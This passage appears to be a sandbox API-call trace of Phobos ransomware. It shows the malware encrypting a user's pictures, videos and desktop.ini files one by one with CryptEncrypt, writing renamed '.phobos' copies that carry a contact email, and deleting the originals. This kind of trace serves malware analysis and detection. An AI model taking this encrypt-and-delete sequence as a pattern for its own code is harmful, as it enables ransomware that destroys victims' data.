halpmcxz\\pictures\\n0cbh4dn7_2g5e\\nrnbek sd.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\nRnbeK sd.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\nrnbek sd.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.179] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.179] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\nRnbeK sd.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\nrnbek sd.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.179] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0199.179] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.179] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2112, lpOverlapped=0x0) returned 1 [0199.297] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2120, dwBufLen=0x2120 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2120) returned 1 [0199.298] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2120, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2120, lpOverlapped=0x0) returned 1 [0199.299] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32be8) returned 1 [0199.299] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.299] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0199.299] CryptDestroyKey (hKey=0xa32be8) returned 1 [0199.299] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0199.299] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.299] CloseHandle (hObject=0x160) returned 1 [0199.299] CloseHandle (hObject=0x178) returned 1 [0199.299] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\n0cbh4dN7_2G5e\\nRnbeK sd.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\n0cbh4dn7_2g5e\\nrnbek sd.jpg")) returned 1 [0199.302] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.302] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=282) returned 1 [0199.302] CloseHandle (hObject=0x178) returned 1 [0199.302] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini")) returned 0x26 [0199.302] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.303] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.303] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.303] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0199.303] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.304] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x11a, lpOverlapped=0x0) returned 1 [0199.304] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x120, dwBufLen=0x120 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x120) returned 1 [0199.304] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x120, lpOverlapped=0x0) returned 1 [0199.305] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32be8) returned 1 [0199.305] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.305] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0199.305] CryptDestroyKey (hKey=0xa32be8) returned 1 [0199.305] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0199.305] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.305] CloseHandle (hObject=0x178) returned 1 [0199.305] CloseHandle (hObject=0x160) returned 1 [0199.305] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini")) returned 1 [0199.306] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.307] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=524) returned 1 [0199.307] CloseHandle (hObject=0x160) returned 1 [0199.307] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini")) returned 0x26 [0199.307] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.307] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.307] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.308] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0199.308] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.308] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x20c, lpOverlapped=0x0) returned 1 [0199.309] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x210, dwBufLen=0x210 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x210) returned 1 [0199.309] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x210, lpOverlapped=0x0) returned 1 [0199.310] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32be8) returned 1 [0199.310] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.310] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0199.310] CryptDestroyKey (hKey=0xa32be8) returned 1 [0199.310] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0199.310] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.310] CloseHandle (hObject=0x160) returned 1 [0199.310] CloseHandle (hObject=0x178) returned 1 [0199.310] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini")) returned 1 [0199.328] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.328] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-HKNW.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-hknw.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.361] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=62310) returned 1 [0199.361] CloseHandle (hObject=0x140) returned 1 [0199.361] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-HKNW.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-hknw.flv")) returned 0x20 [0199.361] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-HKNW.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-hknw.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-HKNW.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-hknw.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.362] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.362] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.362] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-HKNW.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-hknw.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.363] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0199.363] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.363] ReadFile (in: hFile=0x140, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xf366, lpOverlapped=0x0) returned 1 [0199.364] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf370, dwBufLen=0xf370 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf370) returned 1 [0199.365] WriteFile (in: hFile=0x174, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf370, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf370, lpOverlapped=0x0) returned 1 [0199.367] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32b68) returned 1 [0199.367] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.367] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0199.367] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.367] WriteFile (in: hFile=0x174, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0199.367] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.367] CloseHandle (hObject=0x140) returned 1 [0199.367] CloseHandle (hObject=0x174) returned 1 [0199.367] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-HKNW.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-hknw.flv")) returned 1 [0199.369] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6lOkmni7_Q.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6lokmni7_q.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.371] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=34718) returned 1 [0199.371] CloseHandle (hObject=0x174) returned 1 [0199.371] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6lOkmni7_Q.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6lokmni7_q.swf")) returned 0x20 [0199.371] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6lOkmni7_Q.swf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6lokmni7_q.swf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.371] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6lOkmni7_Q.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6lokmni7_q.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.371] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.371] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.371] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6lOkmni7_Q.swf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6lokmni7_q.swf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.372] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0199.372] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.372] ReadFile (in: hFile=0x174, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x879e, lpOverlapped=0x0) returned 1 [0199.374] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x87a0, dwBufLen=0x87a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x87a0) returned 1 [0199.374] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x87a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x87a0, lpOverlapped=0x0) returned 1 [0199.376] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32b68) returned 1 [0199.376] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.376] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0199.376] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.376] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0199.377] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.377] CloseHandle (hObject=0x174) returned 1 [0199.377] CloseHandle (hObject=0x140) returned 1 [0199.377] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6lOkmni7_Q.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6lokmni7_q.swf")) returned 1 [0199.378] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.378] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\AmiaAp.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\amiaap.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.379] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=88897) returned 1 [0199.380] CloseHandle (hObject=0x140) returned 1 [0199.380] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\AmiaAp.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\amiaap.mkv")) returned 0x20 [0199.380] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\AmiaAp.mkv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\amiaap.mkv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\AmiaAp.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\amiaap.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.380] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.380] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\AmiaAp.mkv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\amiaap.mkv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.381] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0199.381] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.381] ReadFile (in: hFile=0x140, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x15b41, lpOverlapped=0x0) returned 1 [0199.383] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x15b50, dwBufLen=0x15b50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x15b50) returned 1 [0199.384] WriteFile (in: hFile=0x174, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x15b50, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x15b50, lpOverlapped=0x0) returned 1 [0199.386] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32b68) returned 1 [0199.386] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, 